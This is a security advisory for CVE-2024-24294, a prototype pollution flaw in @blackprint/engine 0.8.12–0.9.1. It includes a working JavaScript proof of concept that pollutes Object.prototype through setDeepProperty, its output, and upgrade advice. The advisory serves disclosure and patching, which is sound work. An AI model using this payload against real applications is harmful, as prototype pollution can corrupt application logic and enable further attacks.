Versions of @blackprint/engine from 0.8.12 to 0.9.1 are vulnerable to prototype pollution. The function setDeepProperty
recursively assign the source property to the destination with out proper validation which can be exploited by an attacker by modifying the prototype of Object
using a payload like: [["__proto__"], "..."]
(async () => {
const lib = await import('@blackprint/engine');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default._utils.setDeepProperty ({},[["__proto__"], "polluted"], true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
upgrade to version 0.9.2 or a later version.
https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013 https://nvd.nist.gov/vuln/detail/CVE-2024-24294